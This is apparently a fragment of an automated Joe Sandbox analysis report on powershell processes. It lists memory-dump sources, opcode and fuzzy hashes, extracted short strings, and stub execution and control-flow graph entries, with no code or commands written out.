                                                                                                                                                                        • Instruction ID: d971b3430f2f0e6d3a72ccb26c943ac3693c09dc366eccf73854ef96a8f051a1
                                                                                                                                                                        • Opcode Fuzzy Hash: abce0e9cc7800b0ef23a3ba8afb84cee47d4376af3fc7300be3743bdc4920108
                                                                                                                                                                        • Instruction Fuzzy Hash: ADE04F3580410D9FDB08ABB4E81A4EDBF34FB00311F00016ADA0282781DE341A8BCAD1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5cca248e08205189c0ae6c25f9cc51e2b870586a9f9e874d85483e24fba4c9b7
                                                                                                                                                                        • Instruction ID: c39f728c642d6e37ad5e55f10cb599160a023e80fe0964d0813f1d72ec05ad0d
                                                                                                                                                                        • Opcode Fuzzy Hash: 5cca248e08205189c0ae6c25f9cc51e2b870586a9f9e874d85483e24fba4c9b7
                                                                                                                                                                        • Instruction Fuzzy Hash: DEE04F75A0820E8FC708EBB4E44B5E9BFB0BB45215F10416AED4A93B80DA305946CFD1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7fe5ad5a6178cdcdc04d11c91f4957cc13e8924ca99e409e450e81c011a703d8
                                                                                                                                                                        • Instruction ID: 6c54b05dafd90f8131578eb3dfae8e9b2a2fc8d22b2889f1526c08d7eb324156
                                                                                                                                                                        • Opcode Fuzzy Hash: 7fe5ad5a6178cdcdc04d11c91f4957cc13e8924ca99e409e450e81c011a703d8
                                                                                                                                                                        • Instruction Fuzzy Hash: EEE0863570461857CF093779A81C2AE7A57FBC5735F04016AD60A83341DF7D59068BE9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3748c7576995fac17c344daee00175c9afc896578756d1c43a138c64ccaccb33
                                                                                                                                                                        • Instruction ID: 9d6ce0248d03b450e748baf1f6a303f41331e8ddf645818c553bac1399ab1017
                                                                                                                                                                        • Opcode Fuzzy Hash: 3748c7576995fac17c344daee00175c9afc896578756d1c43a138c64ccaccb33
                                                                                                                                                                        • Instruction Fuzzy Hash: FDD0A7527422365F855431FE1A40BBBB1CFCEC65E071901369A17C3351ED48DC0703E6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                        • Instruction ID: 70026b9b68bdf5eedef30e220271ace3b6b7c78dd3b8ae43bea69fc88ac44f5b
                                                                                                                                                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                        • Instruction Fuzzy Hash: FAE08632B00414978B089599D4104D9F7B5DFCC220F04847BD90AA7340DE325916C691
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 60857613fd2b9a9de2542c923ffcbaea0b3bd66591078254498d1ef59e517e57
                                                                                                                                                                        • Instruction ID: 13c639c54dfee6dd86d33a27a9237a25871a6f8b55ed006ed9223ddacfb28bc1
                                                                                                                                                                        • Opcode Fuzzy Hash: 60857613fd2b9a9de2542c923ffcbaea0b3bd66591078254498d1ef59e517e57
                                                                                                                                                                        • Instruction Fuzzy Hash: 53E0C232740B28478611A67EA81085F77DBEFC5A7230048AEE02EC7300DF64EC068BE5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6350a984ddb0a65ccbd820be096f82e678a2ccc01eb17d0b6ab7c466913d5b21
                                                                                                                                                                        • Instruction ID: 89611b2b27e8abf9724df50c5d1cf53102d66721b390fec1b21b3f4fe0631377
                                                                                                                                                                        • Opcode Fuzzy Hash: 6350a984ddb0a65ccbd820be096f82e678a2ccc01eb17d0b6ab7c466913d5b21
                                                                                                                                                                        • Instruction Fuzzy Hash: 63E01A75D0424AAF8780DFBCD8415AAFFF0AB49200B1485EED989D7221E7329A11CBC1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                        • Instruction ID: f65db818d38c0783196326dc259f81f384bfe9b85a315e4620f9bad820a91039
                                                                                                                                                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                        • Instruction Fuzzy Hash: 98D06274D042099F8780DFADC94156EFBF4EB48214F5085AEC919D7751F7315A12CBD1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 618c16f2a2e5ef74406c2d3f914d8220ed25068dc4cf7d611993a463770f7936
                                                                                                                                                                        • Instruction ID: 95e1ae1499dc53efbae6b11fe17d3d656c7b8d12c13596e417cf36587751f5f4
                                                                                                                                                                        • Opcode Fuzzy Hash: 618c16f2a2e5ef74406c2d3f914d8220ed25068dc4cf7d611993a463770f7936
                                                                                                                                                                        • Instruction Fuzzy Hash: 62D0673180410DDBDB08ABB5E85F4BDBB74FA14302F404169DA0752390EF351A5ACAD5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 52e4cc8c973278cb7853813e8e58b08b70b05cd44b518eb5f0e4a09be4097256
                                                                                                                                                                        • Instruction ID: 73fd1c68a632d72c500ca449a785b07a3711875c85b31e20849c659156329b33
                                                                                                                                                                        • Opcode Fuzzy Hash: 52e4cc8c973278cb7853813e8e58b08b70b05cd44b518eb5f0e4a09be4097256
                                                                                                                                                                        • Instruction Fuzzy Hash: 86D01734A0820E8FCB48EFB4E84A86EBBB4BB44200F004169ED4A93350EA346901CFC1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8f7947be825300b7487a019884797a67621759d36b70ffd4c45960aafcc06800
                                                                                                                                                                        • Instruction ID: c24afb3706d5d0976a89d014676c90424abbcd4169cd829d9386c316302f424d
                                                                                                                                                                        • Opcode Fuzzy Hash: 8f7947be825300b7487a019884797a67621759d36b70ffd4c45960aafcc06800
                                                                                                                                                                        • Instruction Fuzzy Hash: 81D0A97104E3C88FC30B1B7098380503FB8EE8311930A0CCAE0CA4F2B3C921A849DB62
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a73c3b22a4c7fa1f9d7959fb192b347dcc119af432123fb11a9850db51bacf3b
                                                                                                                                                                        • Instruction ID: 13800e422f3a3f2c189db841016c986abbe84b20f7f1c19dbb2c6b025e70bc37
                                                                                                                                                                        • Opcode Fuzzy Hash: a73c3b22a4c7fa1f9d7959fb192b347dcc119af432123fb11a9850db51bacf3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4AC002165293D04FFB02833508B61663FB1D98752470A8DD2D9818B177C8149816E351
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a416b10b7fb75902150b50d09fb98a9b1a1be6c95b628f6283c0e43c59bf8be5
                                                                                                                                                                        • Instruction ID: 1b53e095cde924258609f454b5a0fa591aa773f0a33e83364f19ecd6d44064c5
                                                                                                                                                                        • Opcode Fuzzy Hash: a416b10b7fb75902150b50d09fb98a9b1a1be6c95b628f6283c0e43c59bf8be5
                                                                                                                                                                        • Instruction Fuzzy Hash: 92B09271044709CFC2496FB5E418814732DBF8021978008A8E91E1A6928E36E889CA85
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $cqk$4'^q$4'^q$4'^q$4'^q$84|l$84|l$piFk$tP^q$tP^q$r~l$r~l
                                                                                                                                                                        • API String ID: 0-2175947571
                                                                                                                                                                        • Opcode ID: 49b0b35238f6699e09fa51fdc513c2e8479bc883e3bdad25d8b162cb3d8dc4c6
                                                                                                                                                                        • Instruction ID: 5a570557a988359457e3818536441d3465d912b5c6291bdd77dd08759bb5a949
                                                                                                                                                                        • Opcode Fuzzy Hash: 49b0b35238f6699e09fa51fdc513c2e8479bc883e3bdad25d8b162cb3d8dc4c6
                                                                                                                                                                        • Instruction Fuzzy Hash: 88D13CB2B0431ADFCB169B6994046AABBF2AFC6311F1484ABD615CF2D1DB31C885C791
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q$$^q$tl$tl
                                                                                                                                                                        • API String ID: 0-750435783
                                                                                                                                                                        • Opcode ID: e8c1a19b3debaa63e3420fc066fabc077cec30a8293f826b7dcf066b5d943e71
                                                                                                                                                                        • Instruction ID: 589067a717c7d40ad94c561ede1bd53fe443c34c7c0d9157fc12aa35bfa78c04
                                                                                                                                                                        • Opcode Fuzzy Hash: e8c1a19b3debaa63e3420fc066fabc077cec30a8293f826b7dcf066b5d943e71
                                                                                                                                                                        • Instruction Fuzzy Hash: CA517DF27043069FCB2A5A698402776BBE2AFC6721F14817BD625CB2D1DF35C881C7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: c861a1b20cf27ba012e6e065879a54a74b2d0fc54288c5f15c5671577508fc88
                                                                                                                                                                        • Instruction ID: 45cdc7c17afd2ed247158689de529b81a362f80f4284b72a2dfaa9d5e0f697fe
                                                                                                                                                                        • Opcode Fuzzy Hash: c861a1b20cf27ba012e6e065879a54a74b2d0fc54288c5f15c5671577508fc88
                                                                                                                                                                        • Instruction Fuzzy Hash: EDB18374E002199FCB55DFA9D990A9DFBF2FF88300F108669E819AB315DB30A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: c37ad440c8c3a784fc43cacfa9bb725aaed5eb8f344452a0862604f1be5b244c
                                                                                                                                                                        • Instruction ID: 328b2b3e924e5549a5bcfd6057b215e0de138f273f124986d94704a8b4deda38
                                                                                                                                                                        • Opcode Fuzzy Hash: c37ad440c8c3a784fc43cacfa9bb725aaed5eb8f344452a0862604f1be5b244c
                                                                                                                                                                        • Instruction Fuzzy Hash: D3B16374E002199FDB54DFA9D990A9DFBF2FF88300F108629E819AB355DB70A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1797683957.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_2ad0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$`_q$`_q$`_q$`_q
                                                                                                                                                                        • API String ID: 0-4175844202
                                                                                                                                                                        • Opcode ID: d944c960f14bf54f4c255433b2cbd1ebf03a6e29cb214f98d1e1108ff9bf3fa3
                                                                                                                                                                        • Instruction ID: fd42d412edcf2f8240e499c7bfbdb697f63a78be6e7ac149689d1f130b8b36a2
                                                                                                                                                                        • Opcode Fuzzy Hash: d944c960f14bf54f4c255433b2cbd1ebf03a6e29cb214f98d1e1108ff9bf3fa3
                                                                                                                                                                        • Instruction Fuzzy Hash: 0FA16074E012199FDB54DFA9D990A9DFBF2FF48300F208629E819AB315DB30A945CF90
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                        • API String ID: 0-1420252700
                                                                                                                                                                        • Opcode ID: 658e2e6dfcfc9ea4773b212ede7a7cdba5812f33d9682c7c5e485c0c7995346e
                                                                                                                                                                        • Instruction ID: 1b78803855f9fd9b9073d4d585d589d846e7fabdca412a770c9233fc58b05606
                                                                                                                                                                        • Opcode Fuzzy Hash: 658e2e6dfcfc9ea4773b212ede7a7cdba5812f33d9682c7c5e485c0c7995346e
                                                                                                                                                                        • Instruction Fuzzy Hash: 49D179F27042958FCB168A6888117BB7BA2AFD5311F14847AEA45CF3D1DF31D982C7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2125118731
                                                                                                                                                                        • Opcode ID: a8d7eb2bae73d904e0447d0a8d3b11d6bada559a9fd2a0cac3179d126e7b6150
                                                                                                                                                                        • Instruction ID: f8b9d81bd0ff4c269748e02df559ecafca7ca4dd8baacef2d8c5da4c0da2e439
                                                                                                                                                                        • Opcode Fuzzy Hash: a8d7eb2bae73d904e0447d0a8d3b11d6bada559a9fd2a0cac3179d126e7b6150
                                                                                                                                                                        • Instruction Fuzzy Hash: 1D2129B27103069BDB28597B8802B27BBD75BC4712F64842AE709CF2C5DF75D851C361
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.1812765516.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_71f0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                        • API String ID: 0-2049395529
                                                                                                                                                                        • Opcode ID: e9b1b78ac30c87b6ec59dc7f16725cf19aa6a8d5dcb51cf8aa754a2d027e6aa6
                                                                                                                                                                        • Instruction ID: e8293a3881b6e1a43b4b03667dba75add7b582947bf321b84280eaaf8159b2f4
                                                                                                                                                                        • Opcode Fuzzy Hash: e9b1b78ac30c87b6ec59dc7f16725cf19aa6a8d5dcb51cf8aa754a2d027e6aa6
                                                                                                                                                                        • Instruction Fuzzy Hash: 9201A2A270D3A64FC72B126819201A56FB25F8B61071A44DBC581DF3D7CE244D4983B7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1896825801.000000000276D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_276d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 6e00abbad76000fcb8afa54b07c25ea0ce4c0cf193ece4453288184dfebb9137
                                                                                                                                                                        • Instruction ID: 7f042774b5a83f509f31252ce7d3abd35a2adbe3c90d859c2da097ff5c600539
                                                                                                                                                                        • Opcode Fuzzy Hash: 6e00abbad76000fcb8afa54b07c25ea0ce4c0cf193ece4453288184dfebb9137
                                                                                                                                                                        • Instruction Fuzzy Hash: 1A01F2712093409AE7308A29CC88B76BFD8DF91325F18C41AEC491B282C7799845C6B1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1896825801.000000000276D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0276D000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_276d000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9ec3233711b64886e01a85890769f0cfa5c665368a8ba336bcb83fe230195e8e
                                                                                                                                                                        • Instruction ID: 299509085cbaa3c1b1ab1c5bcf4ba859f1381efcc066151c43cc6646d452e113
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ec3233711b64886e01a85890769f0cfa5c665368a8ba336bcb83fe230195e8e
                                                                                                                                                                        • Instruction Fuzzy Hash: 9B01527110E3C05ED7228B258C98B62BFB4DF53224F1D81CBDC888F1A3C2695845C772
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1899493352.0000000004160000.00000040.00000800.00020000.00000000.sdmp, Offset: 04160000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_4160000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9a5f6e0184816c57f27001754c7d2cb4abedd82d7045af7d6e64f9cc38909987
                                                                                                                                                                        • Instruction ID: d428f578665b155a8c60618a2f187df5c4ad79988aca37302b820d1245a4513d
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a5f6e0184816c57f27001754c7d2cb4abedd82d7045af7d6e64f9cc38909987
                                                                                                                                                                        • Instruction Fuzzy Hash: CFF0DA35A001059FCB15CF9DD890AEEF7B1FF88324F248199E515A72A1C736EC52CB50

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:6%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:3
                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                        execution_graph 21210 8c06658 21211 8c0669b SetThreadToken 21210->21211 21212 8c066c9 21211->21212

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 389 339b490-339b4b9 390 339b4bb 389->390 391 339b4be-339b7f9 call 339aab4 389->391 390->391 452 339b7fe-339b805 391->452
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: kUxo^${Uxo^$[xo^
                                                                                                                                                                        • API String ID: 0-1768236392
                                                                                                                                                                        • Opcode ID: 663b17bb0b5af5c20492bcb1a9e9c8de2e40fb2d744db738713b5ecd5d30778b
                                                                                                                                                                        • Instruction ID: 473fb1cacf7d5d58a67db2bc79364449eb91beec776588c06f903edade3428a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 663b17bb0b5af5c20492bcb1a9e9c8de2e40fb2d744db738713b5ecd5d30778b
                                                                                                                                                                        • Instruction Fuzzy Hash: 70917C75B007189BDB1AEFB4C4146AEB7E2EF84604B00891DD10AAF340DF786D0A8BD6

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 453 339b4a0-339b4b9 454 339b4bb 453->454 455 339b4be-339b7f9 call 339aab4 453->455 454->455 516 339b7fe-339b805 455->516
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1864485227.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_3390000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: kUxo^${Uxo^$[xo^
                                                                                                                                                                        • API String ID: 0-1768236392
                                                                                                                                                                        • Opcode ID: 931185a7ee67cbd0a42e6fd4b49dddf15fc4efec5fc38eac7fd927c8ab271279
                                                                                                                                                                        • Instruction ID: 5409aea465ad57c565e183d3c321c2397869bb88bf6cc967bf4a543ed9350518
                                                                                                                                                                        • Opcode Fuzzy Hash: 931185a7ee67cbd0a42e6fd4b49dddf15fc4efec5fc38eac7fd927c8ab271279
                                                                                                                                                                        • Instruction Fuzzy Hash: D0915D75B007199BDB1AEFB4C4146AEB7E2EFC4604B00891DD11AAF340DF786D0A8BD6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.1889936093.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7910000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$piFk$piFk$piFk$piFk$piFk$|,Hk$r~l$r~l
                                                                                                                                                                        • API String ID: 0-2495246005
                                                                                                                                                                        • Opcode ID: c53412430e37820d28c96a557c586851b655e47d054dd5b8fcecd23773d98110
                                                                                                                                                                        • Instruction ID: a38fd06a589cea7fa6e89e145981c429389365322665080f9de74a3d9e016494
                                                                                                                                                                        • Opcode Fuzzy Hash: c53412430e37820d28c96a557c586851b655e47d054dd5b8fcecd23773d98110
                                                                                                                                                                        • Instruction Fuzzy Hash: 212237B1B0020ECFCB14AF68C5417AABBE6BF89315F14847AD919CB681DB31DC65C7A1

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
